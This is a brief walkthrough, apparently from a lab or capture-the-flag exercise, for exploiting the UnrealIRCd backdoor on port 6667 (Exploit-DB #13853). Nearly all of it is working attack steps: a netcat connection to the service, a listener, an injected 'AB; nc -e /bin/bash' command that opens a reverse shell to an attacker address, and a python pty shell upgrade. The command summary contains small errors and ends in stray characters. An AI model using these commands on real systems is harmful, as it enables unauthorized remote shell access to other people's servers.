Unreal IRC 6667

1. Search for Exploits

First, check for known exploits in Exploit-DB. A relevant exploit for Unreal IRC is listed as Exploit-DB #13853. This exploit can be used to create a reverse shell by abusing the service running on port 6667.

2. Connect to Target's Unreal IRC with Netcat

sudo nc 10.10.10.10 6667

3. Set up a Listener on Your Kali Machine

sudo nc -lvp 4444

4. Execute the Payload to Create Reverse Shell

AB; nc -e /bin/bash 11.11.11.11 4444

• AB; sends a payload that the server executes (it could be part of the Unreal IRC vulnerability).

• nc -e /bin/bash 11.11.11.11 4444 tells the target system to execute nc and open a reverse shell (/bin/bash) to your Kali machine on port 4444.

5. Establish and Stabilize the Reverse Shell

python -c 'import pty; pty.spawn("/bin/bash")'

This creates a more stable pseudo-terminal, allowing for better interaction with the shell.

Summary of Commands:

1. On Kali Machine (attacker):

   • Start listener on port 4444:

     sudo nc -lvp 4444

2. On Target (10.10.10.10):

   • Connect to Unreal IRC service:

     sudo nc 10.10.10.10 6667

   • Fire off reverse shell command:

     AB; nc -e /bin/bash 11.11.11.11 4444

   • Once connected, stabilize the shell:

     python -c 'import pty; pty.spawn("/bin/bash")'-+6